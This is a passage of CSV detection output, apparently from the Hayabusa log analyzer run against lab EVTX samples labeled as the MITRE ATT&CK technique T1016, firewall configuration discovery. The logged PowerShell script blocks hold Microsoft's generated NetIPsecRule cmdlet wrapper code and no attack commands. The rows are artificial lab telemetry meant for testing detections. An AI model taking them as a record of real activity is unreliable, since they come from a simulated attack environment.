{ $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecRule' function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')]",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', 